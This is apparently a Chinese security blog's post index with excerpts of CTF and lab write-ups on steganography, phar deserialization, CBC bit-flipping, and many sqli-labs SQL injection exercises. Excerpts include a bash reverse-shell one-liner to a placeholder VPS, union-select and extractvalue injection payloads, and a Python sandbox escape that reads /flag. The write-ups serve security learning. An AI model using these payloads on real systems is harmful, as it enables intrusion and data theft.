- 博客(61)
- 收藏
- 关注
RSS订阅
原创 第一届巅峰极客
这个比赛真的是神仙打架,肉鸡划水到底,记下复现过程miscwarmup图片放去stegsolve看一下可以看见最低位有异常数据(最上面具体分析就会看见两个ook编码,一个brainfuck编码,剩下的就是解码了这里有个注意的是,他的编码每一句都在后面加了个英文的句号(你是魔鬼吧??),解码时要把它去掉拼在一起就是flag了loli有个二维...
2019-03-09 22:45:44
1850
2
原创 一个phar://的漏洞
前段时间打了个护网杯,题目质量是真的高,肉鸡又菜了一整场,遇到了一个不太会的东西,复现了一波,记录下好吧。这个鬼东西就是phar://的序列化的漏洞介绍一下phar://跟php://filter 、data://那些一样,都是流包装,可以将一组php文件进行打包,可以创建默认执行的stubstub就是一个标志,格式xxx<?php xxxxx; __HALT_COMPIL...
2018-10-17 22:41:22
5794
原创 linux下反弹shell
最近做了几题都是反弹shell,总结一哈bashbash -i >& /dev/tcp/vps_ip/端口号 0>&1bash -i 生成一个交互式的子进程&表示在Linux后台运行/dev/tcp/vps_ip/端口号 其实是与主机建立tcp连接/dev/[tcp|upd]/host/port是Linux里面比较特殊的文件,读取和写入相...
2018-09-25 20:55:18
1948
原创 cbc字节翻转攻击
本来很久之前就应该把它学了,但是不能静下心看完,拖到现在.........今天上课的时候跟cg一起看,抱着神仙的大腿将它看完了,cg牛逼!!首先我们先看下他的加密过程可以看到,它先将明文进行分块,第一块与初始变量异或,然后秘钥进行加密,得到的密文再与第二块明文进行异或,继续秘钥加密,以此类推,加密过程有个最显著的特点就是:前一个密文用来产生后一个密文接下来是解密的过程,其实懂了...
2018-09-19 20:37:34
1308
1
原创 bee-box
这篇博客就是为了记下bee-box做题过程,随便记记,免得忘了安装先去官网下载了,然后分个新的盘单独放进去,打开虚拟机,双击bee-box.vmx就能安装了打开里面的火狐会自动跳去一个登录界面,默认账号和密码是bee/bug,登录然后就能做题了我是美丽的分割线-------------------------------------接下来讲漏洞HTML Injection ...
2018-09-18 21:21:24
4655
原创 hackme(web wp)
oj说了不要直接给flag,所以就只写思路啦~hide and seek源码就有了Guestbook这题是SQL注入看数据库?mod=read&id=-1 union select 1,2,database(),4#然后就看到数据库是g8表?mod=read&id=-1 union select 1,2,(select table_name fr...
2018-09-06 14:49:49
4274
4
原创 solve me(web wp)
warm up逆着解下码<?php$chars = "1wMDEyY2U2YTY0M2NgMTEyZDQyMjAzNWczYjZgMWI4NTt3YWxmY=";echo hex2bin(strrev(bin2hex((base64_decode($chars)))));得到结果flag{582a0f2c7e302244b110cc461f5cb100}badcom...
2018-09-02 23:06:58
1385
原创 bugku(代码审计 wp)
extract变量覆盖源码<?php$flag='xxx';extract($_GET);if(isset($shiyan)){ $content=trim(file_get_contents($flag)); if($shiyan==$content){ echo'flag{xxx}'; } else{ ech...
2018-09-02 00:25:27
1710
原创 bugku(web进阶 wp)
phpcmsv9这题叫道理应该是考phpcmsv9的漏洞的,但是挂了,连注册都注册不了.......不过有个非预期解,访问一个robots.txt居然就看到flag了,交一发还是对的.......正确的解法应该是找到注册页面填写了以后在post数据最后加一句&info[content]=<img src=http://www.bugku.com/tools/phpyi...
2018-09-02 00:10:52
2538
原创 网鼎杯第二场 wp
本来应该是高校组,结果报错了,弄成了第二场........尴尬........cal(web)这题在url后面加robots.txt可以看到python报错,所以应该是python命令执行试下1+1|ls,发现触发waf,然后继续试下读文件的函数,一波尝试后获得flag1+1+int(([].__class__.__base__.__subclasses__()[40]('/fla...
2018-08-31 23:52:36
1216
原创 BugkuCTF(分析 wp)
flag这题进去一直看,可以看到黑客最后成功上传了一句话木马,然后就下了一个flag.txt,继续找下去就能看到flag了中国菜刀追踪tcp流可以看见有个flag的压缩包binwalk分离一下打开就看到flag了抓到一只苍蝇 ...
2018-08-30 23:21:59
1561
原创 BugkuCTF(web wp)
web2源码就有flag文件上传测试服务器挂了兼忘了当初怎么做了(捂脸计算器这题是要你计算一个数学公式的答案,但是发现只能输一个数字,改下maxlength,然后就能输入就有flag了web基础$_GET这题其实考get方法传参,get方法发个flag,payload:?what=flagweb基础$_POSTpost方法传参矛盾这题要传一个num,...
2018-08-25 16:32:21
4227
1
原创 南邮ctf(web wp)
签到源代码就有了md5 collision传一个字符串,值跟QNKCDZO一样但是又不是它的就行了签到2改了本地的maxlength就能输进去zhimakaimen然后拿到flag了这题不是WEB把图片下载下来丢去010editor就能看到flag了层层递进点进去一直找,找到一个404.html就能看到了,真的藏得很深单身二十年页面很快就跳转,抓...
2018-08-20 17:35:46
3475
原创 jarvis oj(web wp)
api调用这题是slim架构的xxe漏洞,看博客做题2333https://www.leavesongs.com/PENETRATION/slim3-xxe.htmlsimple injectionusername和password是注入点,然后就是确认怎么注入了题目是过滤了空格的,但是可以用/**/绕过确认存在admin表username=admin'/**/...
2018-08-19 14:54:45
6877
原创 sqli-labs (less25-less28a)
这里开始就是各种花式绕waf了,肉鸡打算把它们放在一篇,所以可能会很长less 25or && and至于怎么绕?大小写:Or、oR重复:oorr、anandd符号:&&、||各种编码:0x.....、unicode然后..........没有然后了(想不到了剩下的payload顺便给一给?id=1' oorr extract...
2018-08-04 17:22:04
415
原创 sqli-labs (less23-less24)
less 23报错注入&过滤注释符这关后台查询语句是select xxx form xxx where id='$_GET['id']' limit 0,1讲道理其实跟之前的差不多的,只是对--,#这些注释的符号进行了过滤所以最后的payload就是?id=-1' or extractvalue(1,concat('~',(select schema_name from...
2018-08-04 14:43:28
654
原创 2017ciscn
miscwarmup这题是盲水印加密,拿到一个加密的压缩包和一张png图片,png加密成zip包,然后明文攻击原来的压缩包(时间贼久,等了一个晚上才把压缩包解密了..........看到两张差不多的图丢去stegsolve XOR一下可以看见一堆横纹,然后应该就是盲水印了最后就是放去解密python bwm.py encode fuli.png fuli2.png re...
2018-08-04 14:11:19
1355
1
原创 sqli-labs (less20-less22)
less 20cookie注入这关首先看源码可以看见首次登录,后台会把username放去cookie,再次登录的时候,如果cookie没过期,就会去cookie里面取值,然后进行查询,至于sql语句就是所以我们只要去改掉他的cookie就可以拿到数据库的东西了最后改出来是上面那个,为什么这样写呢,sql查询语句如果前面为空,就会将后面查出来的信息给出来因为源码后面是将...
2018-08-01 22:35:23
985
原创 sqli-labs (less18-less19)
less 18头部注入:user_agent这里不补充http头的知识了,直接看源码可以看到,uname和passwd都有check_input函数检查,所以直接这两个参数注入是不行的了,然后再继续看下去有句sql语句有ip_address和uagent两个参数,而且前面没有检查,可以考虑注入,但是ip一般是数字,比较麻烦,所以决定用uagent注入这里给个脚本,其实重点只是s...
2018-08-01 17:44:07
1681
原创 sqli-labs (less 17)
less 17报错函数注入在开始放出payload之前,可能要先稍微提一下从后台源码可以看出,uname有个check_input函数过滤,但是passwd没有,所以注入点是在passwd上面接下来还要看下extractvalue这个报错函数这里推荐一下官方的解释和一篇讲得简单点的博客https://dev.mysql.com/doc/refman/5.7/en/xml-f...
2018-08-01 00:58:30
474
原创 sqli-labs (less15-less16)
less 15post方法单引号时间盲注这关跟之前的get方法的盲注差不多,具体就不多解释了,因为后台的查询语句是select xxx from "table_name" where uname='$_POST["uname"]' and passwd='$_POST["passwd"]'所以只要构造uname=admin'绕过就行了贴个爆数据库的脚本,其他的改下sql语句就能用了...
2018-07-31 15:29:40
1027
1
原创 sqli-labs (less11-less14)
less 11post方法单引号绕过报错注入这关跟之前get方法的差不了多少,只是get方法换成了post方法post数据uname=1' union select 1,group_concat(schema_name) from information_schema.schemata#&passwd=1可以得到uname=1' union select 1,group...
2018-07-29 21:07:12
1501
原创 sqli-labs (less9-less10)
less 9get方法单引号绕过时间盲注这关是时间盲注,因为无论是对还是错,回显都是you are in,为了区分,我们可以用sleep()函数,错误的时候返回就会延时,方便我们判断payload是?id=1' and If(mid((select schema_name from information_schema.schemata limit 0,1),2,1)='h',1,sl...
2018-07-27 17:21:03
771
原创 sqli-labs (less7-less8) & 菜刀用法
less 7outfile&菜刀用法这关没什么好说的,主要讲讲菜刀用法首先还是先讲一下这关好吧?id=1'会报错,?id=1"则说you are in...use outfile....后台语句是$sql="SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1";所以用?id=1'))--+是可以闭合的,重点不是这里,题目...
2018-07-25 21:18:04
1013
原创 sqli-labs (less5-less6)
写在前面三个函数mid(),substr(),left()mid(string,start,length) //得出字符串sub(string,start,length) //得出字符串left(string,length) //取左边less 5get方法单引号布尔盲注这题跟前面最大的不同就是信息正确的话没有信息回显,只显示you are in...... ...
2018-07-25 12:14:31
487
原创 sqli-labs (less1-less4)
就只是随便记一记less 1get方法的引号闭合id=1'有报错,证明有注入点,然后接下来是看一下有多少列?id=-1' union select 1,2,3--+'这里我们如果只是写select后面加三个以下数字都会报错,证明里面是有三列的,用order by 也可以查出来剩下的就是爆数据库,表,字段,值了爆数据库?id=-1' union select 1,gr...
2018-07-24 16:33:30
1716
1
原创 第二届广东省强网杯
webbroken打开网页拿到一个文件,是jsfuck编码,但是损坏了,然后将开头的[[改成[][就可以解码了然后直接拿去网站解码就行了,注意他弹出的不是flag,他的flag是一个变量名的赋值解码网站推荐https://enkhee-osiris.github.io/Decoder-JSFuck/who are you点进去发现没有权限,然后继续找找,看见cookie...
2018-07-20 22:35:31
796
原创 QCTF 2018xman夏令营选拔赛
小肉鸡太菜了,就只做了三题orz.......x-man-a-face这题挺简单的,拿到一个图片,看见有个二维码发现少了两个定位点,用photoshop补全扫一下就出来一串KFBVIRT3KBZGK5DUPFPVG2LTORSXEX2XNBXV6QTVPFZV6TLFL5GG6YTTORSXE7I=然后base32解码就行了Lottery这题是弱类型匹配,进...
2018-07-15 09:20:56
2180
原创 加了料的报错注入-实验吧
去fuzz一下waf可以看到username不能用括号,然鹅password不能用floor,updatexml,polygon,multipoint,extractvalue,geometrycollection,multinestring,mulpolygon,linestring这些报错函数所以...........怎么注入?!...
2018-06-05 21:32:42
879
1
原创 认真一点!-实验吧
这个题其实是个布尔盲注题,怎么说,正常是you are in,报错是you are not in,触发waf是sql injection detected然后fuzz一下,图我就不贴了,做的时候忘了截下图结果大概是过滤了and,空格,逗号,union,+这里有个坑,fuzz的时候or是可以用的,但是尝试id = 1'/**/or/**/'1'='1的时候报you are not in,不应该啊试了...
2018-06-05 00:17:48
3068
1
原创 sql注入绕过小总结
这篇应该会一直更新,反正遇到了就记一记免得忘了一、引号在sql语句where部分,会用到引号,举个栗子select column_name from information_schema.columns where table_name="table"如果引号过滤了,那样的话上面的查询就进行不了了,这个时候可以用十六进制进行绕过“table"十六进制是0x937461626c6522这样,原来的p...
2018-06-02 22:39:56
1010
原创 让我进去-实验吧
这道题进去看见cookie有个source值很奇怪,把他改成1试一下就收到这段代码$flag = "XXXXXXXXXXXXXXXXXXXXXXX";$secret = "XXXXXXXXXXXXXXX"; // This secret is 15 characters long for security!$username = $_POST["username"];$password =...
2018-05-30 15:05:25
4827
原创 who are you?-实验吧
who are you?这道题点开看见your ip is :xxx.xxx.xx.xxx然后试了巨久改ip,改了一堆了还是撤都没有然后看了大佬的wp的说是时间盲注,试了一下,确实有延迟,然后就用脚本进行时间盲注了爆数据库#-*-coding:utf-8-*-#暴力数据库import requestsimport stringurl = "http://ctf5.shiyanbar.com...
2018-05-26 22:38:46
1602
4
原创 实验吧部分题wp
看起来有点难这道题有点坑,打开页面去试下登录,发现输入admin/admin会报登录失败,错误的用户名和密码,其他的就说数据库没有连上,一开始真的以为没有连上..............然后后面看了下别人的评论,题目没错,那就可能是除了admin其他都是定义好了跳出来数据库没连上http://ctf5.shiyanbar.com/basic/inject/index.php?user...
2018-05-26 11:19:16
569
原创 第一届桂林电子科技大学绿盟杯CTF大赛 wp
misc音频分析拿到一个wav文件,用audacity打开看见很明显是摩斯电码..-. .-.. .- --. .. ... -- --- .-. ... . -.... -.... -.... --. ..- . - --.- .-- 解密就出来了数据包分析分析数据包看见发了个flag.jpg,提出来看一下是真的皮呀..........丢去010看见是个压缩包,里面还有个flag.txt!!激动...
2018-05-21 19:57:13
2904
原创 你真的会PHP吗?&Forms-实验吧
你真的会php吗?进去看见have a fun!! emmm.......一点都不fun........然后响应头看见hint,访问试下然后就看见后台源码了<?php$info = ""; $req = [];$flag="xxxxxxxxxx";ini_set("display_error", false); error_reporting(0); if(!isset...
2018-05-17 16:59:29
1655
原创 拐弯抹角&FALSE-实验吧
最近事是真的多,之前做的题的wp到了现在才写,咸鱼了.............拐弯抹角这道题进去就看见源码,没错了,就是代码审计啊啊啊啊啊题不难,但是确实有学习意义,就贴一贴 <?php// code by SEC@USTCecho '<html><head><meta http-equiv="charset" content="gbk"></...
2018-05-17 16:09:56
957
原创 猫抓老鼠&what the fuck!这是什么鬼东西?-实验吧
猫抓老鼠就打开网页没看到有什么东西,只是要输入一个key,随便乱输入就看见他返回一个有点奇怪的东西然后把它当做key输进去就拿到flag了,不知这道题究竟在考什么...........可能是我太菜了,看不出,感觉flag出来的有点快.........what the fuck!这是什么鬼东西?就一点开网页,看见.....[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[...
2018-05-14 20:07:34
542
原创 NSCTF web200-实验吧
这道题是一题解密题,题目给出了密文和加密程序,然后看着他写出解密脚本就行了加密程序大概是这样 public function encode($str) { $res = ""; $_o = strrev($str); for ($i = 0; $i < strlen($str); $i++) { ...
2018-05-14 19:36:20
431
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人